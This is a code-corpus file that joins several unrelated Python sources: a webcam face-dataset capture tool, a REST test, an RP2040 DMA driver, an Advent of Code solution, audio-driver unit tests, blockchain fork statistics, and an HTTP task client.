    :return: Yields int ids, each one greater than the previous.
    """
    current = random.getrandbits(32)
    while True:
        yield current
        current += 1
def create_dataset(dataset_dir, count, camera):
    """
    Generates dataset from the connected camera.
    :param dataset_dir: Directory to store the output (must end with a path
        separator; file names are appended directly).
    :param count: Number of frames to capture.
    :param camera: Camera ID for opencv lib.
    :raise Exception: If camera does not work.
    """
    if input("Are you ready to take pictures? y/n: ") == "n":
        exit(0)
    video = cv2.VideoCapture(camera)
    cnt = 0
    print(f"Turning on the camera with id {camera} to take {count} frames. Smile :)...")
    unique_seq = unique_id()
    # try/finally guarantees the camera handle is released even when a frame
    # read fails mid-capture (the original leaked it on the error path).
    try:
        while cnt != count:
            filename = f"{dataset_dir}{next(unique_seq)}.png"
            check, frame = video.read()
            if not check:
                raise Exception("Camera does not work!")
            print(f"{cnt}/{count}: Capturing: (unknown)....")
            cv2.imwrite(filename, frame)
            # Pause between frames so consecutive captures differ.
            time.sleep(2)
            cnt += 1
        print("Dataset created successfully!")
    finally:
        video.release()
def check_basedir(dir_to_check):
    """
    Validate that the dataset base directory exists.
    :param dir_to_check: Directory that must already exist.
    :raise Exception: If the directory is missing.
    """
    print(f"Checking directory: {dir_to_check} ...")
    if os.path.isdir(dir_to_check):
        return
    raise Exception("Dataset folder does not exists!")
def process_dataset_directory(base_dir, name, clean):
    """
    Prepare (and optionally wipe) the directory for a named dataset.
    :param base_dir: Base directory for storing the output.
    :param name: Name of the dataset sub-directory.
    :param clean: When True, remove any existing content first.
    :return: Dataset directory path ending with a path separator.
    """
    target = os.path.join(base_dir, name)
    if clean and os.path.isdir(target):
        shutil.rmtree(target)
    if not os.path.isdir(target):
        os.makedirs(target)
    # Trailing separator so callers can concatenate file names directly.
    return os.path.join(target, '')
@click.command()
@click.argument("name")
@click.option('--count', '-c', default=1000, help="Count of images to take. '1000' by default.")
@click.option('--base-dir', '-b', default=os.path.join(os.getcwd(), "dataset"),
              help="Base directory where dataset will be saved. './dataset' in this directory by default.")
@click.option('--clean', '-cl', default=False, help="Should clean existing data. 'False' by default.")
@click.option('--camera', '-ca', default=0, help="Camera input for CV2 lib. '0' by default.")
@click.option('--run-train', '-rt', default=True, help="Should run faces_train.py automatically? True default.")
def main(name, count, base_dir, clean, camera, run_train):
    """
    Basic script to create a dataset for face recognition app.
    :param name: Name of dataset
    :param count: Count of images to create
    :param base_dir: Base directory for storing the output
    :param clean: Should clean the folder if exists
    :param camera: Camera id for opencv lib
    :param run_train: Should run learning automatically
    """
    # Cast values to bool. NOTE(review): bool("False") is True, so a literal
    # string "False" passed on the command line would still enable the flag;
    # confirm whether click delivers these options as bool or str here.
    clean = bool(clean)
    run_train = bool(run_train)
    check_basedir(base_dir)
    dataset_dir = process_dataset_directory(base_dir, name, clean)
    create_dataset(dataset_dir, count, camera)
    if not run_train:
        print("Please run faces_train.py to let python learn from new created dataset.")
    else:
        train_faces()
if __name__ == '__main__':
    # Entry point when the dataset-creation script is executed directly.
    main()
| StarcoderdataPython |
11222245 | <reponame>gehtsoft/backtest-docker<gh_stars>1-10
import json, requests, sys, os.path
import rest_conf as conf
import datafile_rest as datafiles
import unittest
class DataFileTest(unittest.TestCase):
    """End-to-end check of the datafile REST endpoints: add, find, delete."""

    def test_datafiles(self):
        datafile = conf.DATA_ADD
        add_resp = datafiles.add_datafile(datafile)
        self.assertEqual(add_resp.status_code, 200, "Invalid response code {0}, {1}".format(add_resp.status_code, add_resp.content))
        # The freshly added datafile must be discoverable.
        self.assertTrue(datafiles.find_datafile(datafile), "Added datafile not found")
        del_resp = datafiles.delete_datafile(datafile)
        self.assertEqual(del_resp.status_code, 200, "Invalid response delete code {0}, {1}".format(del_resp.status_code, del_resp.content))
        # After deletion the datafile must no longer be found.
        self.assertTrue(not datafiles.find_datafile(datafile), "Datafile was not deleted")
if __name__ == "__main__":
    # Allow running this test module directly with the unittest runner.
    unittest.main()
| StarcoderdataPython |
304235 | import time
import uctypes
import struct
import machine
class DMA:
    """Minimal driver for a single RP2040 DMA channel, programmed through
    direct register access via machine.mem32 (MicroPython)."""

    # Base address of the DMA register block.
    DMA_BASE = 0x50000000

    # Bit fields of the CHx_CTRL_TRIG control register.
    DMA_EN = 0x01 << 0
    HIGH_PRIO = 0x01 << 1
    INCR_READ = 0x01 << 4
    INCR_WRITE = 0x01 << 5
    DREQ_PIO0_RX0 = 0x04 << 15
    DREQ_SPI1_TX = 0x12 << 15
    DREQ_PERMANENT = 0x3F << 15
    IRQ_QUIET = 0x01 << 21
    BUSY = 0x01 << 24

    def __init__(self, channelNumber):
        """Compute the per-channel register addresses (channels are spaced
        0x40 bytes apart)."""
        offset = channelNumber * 0x40
        self.CHx_READ_ADDR = DMA.DMA_BASE + 0x00 + offset
        self.CHx_WRITE_ADDR = DMA.DMA_BASE + 0x04 + offset
        self.CHx_TRANS_COUNT = DMA.DMA_BASE + 0x08 + offset
        self.CHx_CTRL_TRIG = DMA.DMA_BASE + 0x0C + offset

    def config(self, src_addr, dst_addr, count, src_inc, dst_inc, trig_dreq):
        """Program source, destination, transfer count and control flags.

        The channel is left configured but NOT enabled; call enable() to
        start the transfer.
        """
        # Clear the control register before reprogramming the channel.
        machine.mem32[self.CHx_CTRL_TRIG] = 0
        machine.mem32[self.CHx_READ_ADDR] = src_addr
        machine.mem32[self.CHx_WRITE_ADDR] = dst_addr
        machine.mem32[self.CHx_TRANS_COUNT] = count
        ctrl = trig_dreq
        if src_inc:
            ctrl |= DMA.INCR_READ
        if dst_inc:
            ctrl |= DMA.INCR_WRITE
        machine.mem32[self.CHx_CTRL_TRIG] = ctrl

    def enable(self):
        """Set the enable bit to start the programmed transfer."""
        machine.mem32[self.CHx_CTRL_TRIG] |= DMA.DMA_EN

    def disable(self):
        """Clear the whole control register, stopping the channel."""
        machine.mem32[self.CHx_CTRL_TRIG] = 0

    def is_busy(self):
        """Return True while the channel still reports the BUSY flag."""
        # Simplified from an if/else returning True/False.
        return bool(machine.mem32[self.CHx_CTRL_TRIG] & DMA.BUSY)
def test_dma():
    """Benchmark a memory-to-memory copy on DMA channel 0 and print the
    achieved transfer speed."""
    dma = DMA(0)
    src_buf = b"Hello World!"*1000
    dst_buf = bytearray( 12*1000 )
    dma.config(
        src_addr = uctypes.addressof( src_buf ),
        dst_addr = uctypes.addressof( dst_buf ),
        count = len( src_buf ),
        src_inc = True,
        dst_inc = True,
        trig_dreq = DMA.DREQ_PERMANENT
    )
    t0 = time.ticks_us()
    dma.enable()
    # Busy-wait until the channel reports completion.
    while( dma.is_busy() ):
        pass
    dma.disable()
    t1 = time.ticks_us()
    print( "dst", dst_buf[0:12], "..." )
    # NOTE(review): ticks_us() can wrap around; time.ticks_diff(t1, t0) would
    # be safer for long transfers -- confirm on the target board.
    print( "Transfer speed [B/s]:", len( src_buf )/((t1-t0)*1e-6) )
    print( "@CPU freq:", machine.freq() )
if __name__=='__main__':
    # Run the DMA benchmark when executed directly on the board.
    test_dma()
    print( "done" )
6681622 | import numpy as np
from ..solution import Solution
class Day07(Solution, day=7):
def parse(self):
    """Read the puzzle input: a single line of comma-separated integers."""
    with open(self.input_file, "rt") as infile:
        raw = infile.read()
    return [int(token) for token in raw.strip().split(",")]
def part1(self):
    """
    Want to compute argmin_x s(x) where s(x) = Σ_{d ∈ data} |x - d|. Unfortunately,
    s isn't smooth, but we can use the notion of subdifferentials.
    In particular, the subdifferential ∂_d(x) of |x - d| is {-1} for x < d, {1}
    for x > d, and [-1, 1] for x = d. Then the subdifferential of s is
        ∂s(x) = ∑_d ∂_d(x)
    where the sum is the Minkowski sum A + B = { a + b | a ∈ A and b ∈ B }.
    Now the minimum of s will occur at x such that 0 ∈ ∂s(x). Thus, 0 ∈ ∂s(x)
    if and only if::
        |#{d' ∈ data | d' < x} - #{d' ∈ data | d' > x}| ≤ #{d' ∈ data | d' = x}   (1)
    (Note that in the above, each of these sets is considered as a multiset.)
    Now consider the case when (1) is satisfied by some x ∉ data. Then let
    D = min {d' ∈ data | d' > x } and d = max {d' ∈ data | d' < x }. Note d < D.
    Claim 1: When data != ∅, d and D exist. For if x > than all d' ∈ data, we would
    have the LHS of (1) to #data > 0 where as the RHS is definitionally 0. Thus,
    D exists. Similarly for d.
    Claim 2: At least one of d and D also satisfies (1). Consider the case when
        #{d' ∈ data | d' < x} > #{d' ∈ data | d' > x}
    so the LHS of (1) is
        #{d' ∈ data | d' < x} - #{d' ∈ data | d' > x} ≥ 0.
    By assumption, this is 0 since the RHS is 0. But then
        #{d' ∈ data | d' < x} = #{d' ∈ data | d' < D}
    and
        #{d' ∈ data | d' > x} = #{d' ∈ data | d' > D} + #{d' ∈ data | d' = D}.
    Putting this altogether:
        #{d' ∈ data | d' < D} - #{d' ∈ data | d' > D} = #{d' ∈ data | d' = D}
    and so (1) is satisfied by D. If on the other hand,
        #{d' ∈ data | d' < x} < #{d' ∈ data | d' > x}
    then d satisfies (1) by the same logic.
    Thus, since we only need one argmin, we need only check for values that
    appear in data.
    """
    data = np.array(self.data)  # Assume this is nonempty
    values, counts = np.unique(data, return_counts=True)
    # At this point the short version of this code is just the following:
    #
    # potential_argmins = np.arange(values.min(), values.max() + 1, dtype=int)
    # vals = np.sum(np.abs(potential_argmins[:, np.newaxis] - values[np.newaxis, :]) * counts[np.newaxis, :], axis=1)
    # return vals.min()
    # But it's more fun with math!
    # count_lt_value[i] = #{d' ∈ data | d' < values[i]}
    cumsum = np.cumsum(counts)
    count_lt_value = np.hstack([[0], cumsum[:-1]])
    # count_gt_value[i] = #{d' ∈ data | d' > values[i]}
    cumsum = np.cumsum(counts[::-1])[::-1]
    count_gt_value = np.hstack([cumsum[1:], [0]])
    # Indices i where condition (1) from the docstring holds at values[i].
    subgradient_has_zero = np.where(
        np.abs(count_lt_value - count_gt_value) <= counts
    )[0]
    if len(subgradient_has_zero) == 0:
        raise ValueError("Something went wrong in the math!")
    # Any qualifying value minimizes s; take the smallest one.
    argmin = values[subgradient_has_zero[0]]
    return np.sum(np.abs(values - argmin) * counts)
def part2(self):
    """
    In this part, our s(x) is
        s(x) = Σ_{d ∈ data} |x - d| * (|x - d| + 1) / 2 = 1/2 Σ ((x - d)^2 + |x - d|)
    We can throw away the 1/2 for the gradient computation. The resulting terms of
    our sum have a derivative 2(x - d) + ∂_d(x) which is:
        * 2(x - d) + 1 if x > d
        * 2(x - d) - 1 if x < d
        * [-1, 1] if x = d
    And thus the equivalent of (1) above is:
        |#{d' ∈ data | d' < x} - #{d' ∈ data | d' > x} + Σ_{d' ∈ data} 2(x - d')| ≤ #{d' ∈ data | d' = x} (2)
    Now Σ_{d' ∈ data} 2(x - d') = 2 * x * #data - 2 Σ_{d' ∈ data} d', which is convenient.
    Moreover, it is no longer the case that the argmin actually has to reside in
    data, as the example problem makes clear! So we have two cases: When the
    RHS of (2) is 0 and when the RHS of (2) is _not_ zero.
    In the case the RHS of (2) is not zero, then we proceed as in the previous case.
    In the case where the RHS of (2) is zero, we're looking between the various
    d' ∈ data. Consider the case where a, b ∈ data are two consecutive values in
    data. Then on the interval (a, b) the subgradient is linear in x, and we ask
    whether it changes sign between a and b.

    Returns the minimal total fuel cost (an integer or a NumPy scalar).
    """
    data = np.array(self.data)  # Assume this is nonempty
    values, counts = np.unique(data, return_counts=True)
    # At this point the short version of this code is just the following:
    #
    # potential_argmins = np.arange(values.min(), values.max() + 1, dtype=int)
    # tmp = np.abs(potential_argmins[:, np.newaxis] - values[np.newaxis, :])
    # tmp *= (tmp + 1) * counts[np.newaxis, :]
    # vals = np.sum(tmp, axis=1) / 2
    # return vals.min()
    # But it's more fun with math!
    cumsum = np.cumsum(counts)
    count_lt_value = np.hstack([[0], cumsum[:-1]])
    cumsum = np.cumsum(counts[::-1])[::-1]
    count_gt_value = np.hstack([cumsum[1:], [0]])
    # Per (2): Σ_{d'} 2(x - d') = 2 * x * #data - 2 * Σ d'.
    # (Bugfix: a previous version dropped the `* len(data)` factor on the x
    # term, so this optimality test essentially never fired -- e.g. uniform
    # data such as [5, 5, 5] fell through and raised ValueError below.)
    extra_term = 2 * (values * len(data) - np.sum(data))
    # The case when the RHS of (2) is not 0:
    subgradient_has_zero = np.where(
        np.abs(count_lt_value - count_gt_value + extra_term) <= counts
    )[0]
    if len(subgradient_has_zero) != 0:
        argmin = values[subgradient_has_zero[0]]
        tmp = np.abs(values - argmin)
        return np.sum(tmp * (tmp + 1) * counts) / 2
    # The case when the RHS of (2) is 0: the minimizer lies strictly between
    # consecutive data values.  Index each open interval (a, b) by its left
    # endpoint a; add `counts` back in because every d' = a now satisfies
    # d' < x for x in (a, b).
    lhs = (count_lt_value - count_gt_value - 2 * np.sum(data) + counts)[:-1]
    # On (a, b) the subgradient is lhs[i] + 2 * x * #data; find the interval
    # where it changes sign.
    opp_sign = ((lhs + 2 * values[:-1] * len(data)) < 0) != (
        lhs + 2 * values[1:] * len(data) < 0
    )
    if not opp_sign.any():
        raise ValueError("Need to deal with off to the left and right cases")
    # Now the true (continuous) minimum is inside this interval:
    idx = np.where(opp_sign)[0][0]
    a = values[idx]
    b = values[idx + 1]
    ya = lhs[idx] + 2 * a * len(data)
    # Bugfix: evaluate the SAME linear piece (lhs[idx]) at both endpoints; the
    # previous version mixed in lhs[idx + 1], which belongs to the next
    # interval, skewing the interpolated root.
    yb = lhs[idx] + 2 * b * len(data)
    argmin = -ya * (b - a) / (yb - ya) + a
    # However, we're only allowed to move integer amounts, so we have to round.
    # s is convex, so the integer optimum is at floor(argmin) or ceil(argmin).
    lower = np.abs(values - np.floor(argmin))
    upper = np.abs(values - np.ceil(argmin))
    return int(
        min(
            [
                np.sum(lower * (lower + 1) * counts) / 2,
                np.sum(upper * (upper + 1) * counts) / 2,
            ]
        )
    )
| StarcoderdataPython |
9611650 | <gh_stars>0
import unittest
import logging
import sys
sys.path.append('../')
from backend.bcm2835audiodriver import Bcm2835AudioDriver
from cleep.exception import InvalidParameter, MissingParameter, CommandError, Unauthorized
from cleep.libs.tests import session, lib
import os
import time
from mock import Mock, MagicMock, patch
class TestBcm2835AudioDriver(unittest.TestCase):
    """Unit tests for Bcm2835AudioDriver.

    All hardware/filesystem collaborators are mocked.  Tests that need a
    driver instance build one via init_session().  The @patch decorators
    replace the backend module's Tools/ConfigTxt/EtcAsoundConf/Alsa classes;
    decorator order matters (innermost decorator maps to the first mock
    parameter).
    """

    def setUp(self):
        # Fresh test session per test; logging effectively silenced (CRITICAL).
        self.session = lib.TestLib()
        logging.basicConfig(level=logging.CRITICAL, format=u'%(asctime)s %(name)s:%(lineno)d %(levelname)s : %(message)s')

    def tearDown(self):
        pass

    def init_session(self):
        """Build the driver under test with a mocked filesystem and register it."""
        self.fs = Mock()
        self.driver = Bcm2835AudioDriver()
        self.driver.cleep_filesystem = Mock()
        self.driver._on_registered()

    def test__get_card_name(self):
        # A device whose descriptions contain 'bcm2835' is recognized.
        self.driver = Bcm2835AudioDriver()
        self.driver.cleep_filesystem = Mock()
        devices_names = [
            { 'card_name': 'Headphones', 'card_desc': 'bcm2835 Headphones', 'device_name': 'Headphones', 'device_desc': 'bcm2835 Headphones' },
        ]
        result = self.driver._get_card_name(devices_names)
        self.assertEqual(result, 'Headphones')

    def test__get_card_name_card_not_found(self):
        # Without the 'bcm2835' marker in the descriptions, no card matches.
        self.driver = Bcm2835AudioDriver()
        self.driver.cleep_filesystem = Mock()
        devices_names = [
            { 'card_name': 'Headphones', 'card_desc': 'Headphones', 'device_name': 'Headphones', 'device_desc': 'Headphones' },
        ]
        result = self.driver._get_card_name(devices_names)
        self.assertIsNone(result)

    @patch('backend.bcm2835audiodriver.Tools')
    @patch('backend.bcm2835audiodriver.ConfigTxt')
    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    def test__install(self, mock_asound, mock_configtxt, mock_tools):
        # Install deletes /etc/asound.conf and enables onboard audio in config.txt.
        mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
        self.init_session()

        self.driver._install()

        self.assertTrue(mock_asound.return_value.delete.called)
        self.assertTrue(mock_configtxt.return_value.enable_audio.called)

    @patch('backend.bcm2835audiodriver.Tools')
    @patch('backend.bcm2835audiodriver.ConfigTxt')
    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    def test__install_enable_audio_failed(self, mock_asound, mock_configtxt, mock_tools):
        mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
        mock_configtxt.return_value.enable_audio.return_value = False
        self.init_session()

        with self.assertRaises(Exception) as cm:
            self.driver._install()
        self.assertEqual(str(cm.exception), 'Error enabling raspberry pi audio')
        self.assertTrue(mock_asound.return_value.delete.called)

    @patch('backend.bcm2835audiodriver.Tools')
    def test__install_with_no_audio_supported(self, mock_tools):
        # Boards without onboard audio must refuse installation.
        mock_tools.raspberry_pi_infos.return_value = { 'audio': False }
        self.init_session()

        with self.assertRaises(Exception) as cm:
            self.driver._install()
        self.assertEqual(str(cm.exception), 'Raspberry pi has no onboard audio device')

    @patch('backend.bcm2835audiodriver.Tools')
    @patch('backend.bcm2835audiodriver.ConfigTxt')
    def test__uninstall(self, mock_configtxt, mock_tools):
        mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
        self.init_session()

        self.driver._uninstall()

        self.assertTrue(mock_configtxt.return_value.disable_audio.called)

    @patch('backend.bcm2835audiodriver.Tools')
    @patch('backend.bcm2835audiodriver.ConfigTxt')
    def test__uninstall_disable_audio_failed(self, mock_configtxt, mock_tools):
        mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
        mock_configtxt.return_value.disable_audio.return_value = False
        self.init_session()

        with self.assertRaises(Exception) as cm:
            self.driver._uninstall()
        self.assertEqual(str(cm.exception), 'Error disabling raspberry pi audio')

    @patch('backend.bcm2835audiodriver.Tools')
    def test__uninstall_with_no_audio_supported(self, mock_tools):
        mock_tools.raspberry_pi_infos.return_value = { 'audio': False }
        self.init_session()

        with self.assertRaises(Exception) as cm:
            self.driver._uninstall()
        self.assertEqual(str(cm.exception), 'Raspberry pi has no onboard audio device')

    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    def test_enable(self, mock_asound):
        # Happy path: asound.conf rewritten, amixer control set, alsa state saved.
        self.init_session()
        mock_alsa = MagicMock()
        self.driver.alsa = mock_alsa
        self.driver.get_cardid_deviceid = Mock(return_value=(0, 0))
        self.driver.get_control_numid = Mock(return_value=1)

        self.assertTrue(self.driver.enable())

        self.assertTrue(mock_asound.return_value.delete.called)
        self.assertTrue(mock_asound.return_value.save_default_file.called)
        self.assertTrue(mock_alsa.amixer_control.called)
        self.assertTrue(mock_alsa.save.called)

    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    @patch('backend.bcm2835audiodriver.Alsa')
    def test_enable_no_card_infos(self, mock_alsa, mock_asound):
        # When no card/device id can be resolved, enable() bails out early.
        self.init_session()
        self.driver.get_cardid_deviceid = Mock(return_value=(None, None))

        self.assertFalse(self.driver.enable())

        self.assertTrue(mock_asound.return_value.delete.called)
        self.assertFalse(mock_asound.return_value.save_default_file.called)
        self.assertFalse(mock_alsa.return_value.amixer_control.called)
        self.assertFalse(mock_alsa.return_value.save.called)

    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    @patch('backend.bcm2835audiodriver.Alsa')
    def test_enable_alsa_save_default_file_failed(self, mock_alsa, mock_asound):
        mock_asound.return_value.save_default_file.return_value = False
        self.init_session()
        self.driver.get_cardid_deviceid = Mock(return_value=(0, 0))

        self.assertFalse(self.driver.enable())

        self.assertTrue(mock_asound.return_value.delete.called)
        self.assertTrue(mock_asound.return_value.save_default_file.called)
        self.assertFalse(mock_alsa.return_value.amixer_control.called)
        self.assertFalse(mock_alsa.return_value.save.called)

    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    def test_enable_alsa_amixer_control_failed(self, mock_asound):
        self.init_session()
        mock_alsa = MagicMock()
        mock_alsa.amixer_control.return_value = False
        self.driver.alsa = mock_alsa
        self.driver.get_cardid_deviceid = Mock(return_value=(0, 0))
        self.driver.get_control_numid = Mock(return_value=1)

        self.assertFalse(self.driver.enable())

        self.assertTrue(mock_asound.return_value.delete.called)
        self.assertTrue(mock_asound.return_value.save_default_file.called)
        self.assertTrue(mock_alsa.amixer_control.called)
        self.assertFalse(mock_alsa.save.called)

    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    def test_disable(self, mock_asound):
        # Disabling simply removes /etc/asound.conf.
        self.init_session()

        self.assertTrue(self.driver.disable())

        self.assertTrue(mock_asound.return_value.delete.called)

    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    def test_disable_asound_delete_failed(self, mock_asound):
        mock_asound.return_value.delete.return_value = False
        self.init_session()

        self.assertFalse(self.driver.disable())

        self.assertTrue(mock_asound.return_value.delete.called)

    @patch('backend.bcm2835audiodriver.EtcAsoundConf')
    def test_is_enabled(self, mock_asound):
        # Enabled only when the card is enabled AND asound.conf exists.
        self.init_session()

        self.driver.is_card_enabled = Mock(return_value=True)
        mock_asound.return_value.exists.return_value = True
        self.assertTrue(self.driver.is_enabled())

        self.driver.is_card_enabled = Mock(return_value=False)
        mock_asound.return_value.exists.return_value = True
        self.assertFalse(self.driver.is_enabled())

        self.driver.is_card_enabled = Mock(return_value=True)
        mock_asound.return_value.exists.return_value = False
        self.assertFalse(self.driver.is_enabled())

    def test__set_volumes_controls(self):
        self.init_session()
        self.driver.alsa = Mock()
        self.driver.alsa.get_simple_controls.return_value = ['PCM']
        self.driver.get_control_numid = Mock(return_value=3)

        self.driver._set_volumes_controls()

        self.assertEqual(self.driver.volume_control, 'PCM')
        self.assertEqual(self.driver.volume_control_numid, 3)

    def test_get_volumes(self):
        # bcm2835 has no capture device, hence capture is always None.
        self.init_session()
        mock_alsa = Mock()
        mock_alsa.get_volume.return_value = 66
        self.driver.alsa = mock_alsa

        vols = self.driver.get_volumes()

        self.assertEqual(vols, { 'playback': 66, 'capture': None })

    def test_set_volumes(self):
        self.init_session()
        mock_alsa = Mock()
        mock_alsa.set_volume.return_value = 99
        self.driver.alsa = mock_alsa

        vols = self.driver.set_volumes(playback=12, capture=34)

        self.assertEqual(vols, { 'playback': 99, 'capture': None })

    def test_require_reboot(self):
        self.init_session()
        self.assertFalse(self.driver.require_reboot())
if __name__ == "__main__":
    # Run the suite when this file is executed directly.
    # coverage run --omit="*lib/python*/*","test_*" --concurrency=thread test_audio.py; coverage report -m -i
    unittest.main()
| StarcoderdataPython |
4923248 | <reponame>andreaskern/simcoin
import logging
from bitcoin.rpc import JSONRPCError
from setuptools.package_index import unique_everseen
import utils
import config
from operator import attrgetter
class CliStats:
    """Collects chain/fork statistics from the simulation nodes via RPC and
    persists them as CSV files."""

    def __init__(self, context, writer):
        self._context = context
        self._writer = writer

    def execute(self):
        """Run every collection step once."""
        height = self._context.first_block_height
        nodes = self._context.nodes.values()
        if height is None:  # was `height == None`; identity check is the idiom
            height = 0
        _persist_consensus_chain(self._calc_consensus_chain(height, nodes))
        self._persist_node_stats()
        self._collect_forks_form_getchaintips()  # TODO fix headers
        logging.info('Executed cli stats')

    def _calc_consensus_chain(self, height, nodes):
        """Return the run of block hashes, starting at *height*, on which all
        nodes agree.  Stops at the first height where some node has no block
        or the nodes return different hashes."""
        consensus_chain = []
        logging.info('Calculating consensus chain starting with height={}'.format(height))
        while True:
            block_hashes = {}
            failing_nodes = []
            block_hash = None
            for node in nodes:
                try:
                    block_hash = node.execute_rpc('getblockhash', height)
                    if block_hash in block_hashes:
                        block_hashes[block_hash].append(node.name)
                    else:
                        block_hashes[block_hash] = [node.name]
                except JSONRPCError:
                    failing_nodes.append(node.name)

            if len(failing_nodes) > 0:
                logging.info('Stopped calculating consensus chain on height={} because nodes={}'
                             ' have no block on this height'.format(height, failing_nodes))
                break
            elif len(block_hashes) > 1:
                logging.info('Stopped calculating consensus chain on height={} because'
                             ' nodes have different blocks ({})'.format(height, block_hashes))
                break
            else:
                consensus_chain.append(block_hash)
                height += 1
                logging.info('Added block with hash={} to consensus chain'.format(block_hash))

        logging.info('Calculated {} block long consensus chain from {} nodes and until height={}'
                     .format(len(consensus_chain), len(nodes), height - 1))
        return consensus_chain

    def _persist_node_stats(self):  # forks calculated here
        """Collect every node's `getchaintips` entries and write tips.csv."""
        tips = []
        for node in self._context.nodes.values():
            tips.extend(
                [
                    Tip.from_dict(
                        node.name,
                        chain_tip
                    )
                    for chain_tip
                    in node.execute_rpc('getchaintips')
                ]
            )
        self._writer.write_csv(
            Tip.file_name,
            Tip.csv_header,
            tips
        )
        logging.info('Collected and persisted {} tips'.format(len(tips)))

    def _collect_forks_form_getchaintips(self):
        self.__collect_forks_form_getchaintips(
            self._context.nodes.values(),
            self._writer
        )

    @staticmethod
    def __collect_forks_form_getchaintips(node_values, writer):
        """Collect `getchaintips` entries from all nodes, keep only the fully
        validated forks, de-duplicate them by block hash and write forks.csv.

        Possible values for status:
          1. "invalid"        branch contains invalid blocks
          2. "headers-only"   not all blocks for this branch are available, but the headers are valid
          3. "valid-headers"  all blocks are available for this branch, but they were never fully validated
          4. "valid-fork"     branch is not part of the active chain, but is fully validated
          5. "active"         the tip of the active main chain, which is certainly valid

        fork life cycle:
          headers-only -> valid-headers -> {invalid, valid-fork -> active -> [REC:valid-fork]}
        """
        logging.info('Collecting forks.csv from getchaintips')
        tips = []
        for node in node_values:
            tips.extend(
                [
                    Tip.from_dict(
                        node.name,
                        chain_tip
                    )
                    for chain_tip
                    in node.execute_rpc('getchaintips')
                ]
            )
        # filter status != valid-fork
        # (a previous revision first built a throwaway list of interleaved
        # heights/statuses here; that dead code has been removed)
        forks = [tip for tip in tips if tip.is_valid_fork()]
        # aggregate by hash
        forks = unique_everseen(forks, key=attrgetter('_hash'))
        # sort by height ('tag' is added later)
        forks = sorted(forks, key=attrgetter('_height'))
        writer.write_csv(
            "forks.csv",
            ['node', 'status', 'length', 'height', 'tag'],
            forks
        )
def _persist_consensus_chain(chain):
    """Write the consensus chain (header line plus one block hash per line)
    to the configured CSV path."""
    with open(config.consensus_chain_csv, 'w') as file:
        file.write('hash\n')
        # Single write of the joined string.  The previous `writelines()` call
        # on a str worked only because a str iterates character by character,
        # which is misleading and needlessly slow.
        file.write('\n'.join(chain))
        file.write('\n')
class Tip:
    """One entry of a node's `getchaintips` RPC result."""

    __slots__ = ['_node', '_status', '_branchlen', '_height', '_hash']
    csv_header = ['node', 'status', 'branchlen', 'height', 'hash']
    file_name = 'tips.csv'

    def __init__(self, node, status, branchlen, height, hash):
        self._node = node
        self._status = status
        self._branchlen = branchlen
        self._height = height
        self._hash = hash

    def is_valid_fork(self) -> bool:
        """True when this tip is a fully validated fork off the main chain."""
        return 'valid-fork' == self._status

    @classmethod
    def from_dict(cls, node, chain_tip):
        """Build a Tip for *node* from one `getchaintips` result dict."""
        status = chain_tip['status']
        branchlen = chain_tip['branchlen']
        height = chain_tip['height']
        block_hash = chain_tip['hash']
        return cls(node, status, branchlen, height, block_hash)

    def vars_to_array(self):
        """Return the field values in `csv_header` order."""
        return [getattr(self, slot) for slot in self.__slots__]
| StarcoderdataPython |
from yolov5.utils.plots import plot_results
# Render the training metrics of run exp175; yolov5 writes the chart next to
# the CSV (Windows-style path, hence the escaped backslashes).
plot_results('runs\\train\\exp175\\results.csv') # plot 'results.csv' as 'results.png'
8115048 | <reponame>rw-meta/starter-py-client
# coding=utf-8
import json
import logging
from time import sleep
import requests
class PrivateApi:
    """Thin client for the starter's private task-submission HTTP API."""

    headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}

    def __init__(self, api_url):
        self.api_url = api_url
        self.max_retries = 30  # connection/timeout errors are retried this many times

    def submit(self, task):
        """
        Submit *task* to the starter service and return the decoded JSON response.

        :type task: Task
        :raises IOError: when the service answers with a non-JSON body
        :raises requests.exceptions.ConnectionError/Timeout: when every retry fails
        """
        if self.api_url == 'http://STUB_URL':
            logging.info(u'STARTER CLIENT DEV MODE Задача условно поставлена')
            return
        url = self.api_url + '/services/' + task.serviceId + '/tasks'
        last_e = None
        for _ in range(self.max_retries):
            try:
                resp = requests.post(
                    url=url,
                    data=json.dumps(task.__dict__),
                    headers=self.headers,
                    timeout=15
                )
                try:
                    return json.loads(resp.text)
                except ValueError:
                    # Was a bare `except:`.  Only a JSON decode failure
                    # (ValueError / json.JSONDecodeError) should be translated
                    # into IOError here -- a bare except would also have
                    # swallowed KeyboardInterrupt/SystemExit.
                    raise IOError("Starter response read error: " + resp.text)
            except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as e:
                # При ошибках подключения пытаемся еще раз
                last_e = e
                sleep(3)
        raise last_e
| StarcoderdataPython |
5025676 | # Copyright 2017 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import traceback
from catalog.packages.biz.ns_descriptor import NsDescriptor
from catalog.pub.config.config import CATALOG_ROOT_PATH, CATALOG_URL_PATH
from catalog.pub.config.config import REG_TO_MSB_REG_PARAM
from catalog.pub.database.models import NSPackageModel, VnfPackageModel
from catalog.pub.exceptions import CatalogException
from catalog.pub.msapi import sdc
from catalog.pub.utils import fileutil
from catalog.pub.utils import toscaparser
logger = logging.getLogger(__name__)
STATUS_SUCCESS, STATUS_FAILED = "success", "failed"
METADATA = "metadata"
def fmt_ns_pkg_rsp(status, desc, error_code="500"):
    """Build the standard ``[retcode, payload]`` response for NS package actions."""
    payload = {
        "status": status,
        "statusDescription": desc,
        "errorCode": error_code,
    }
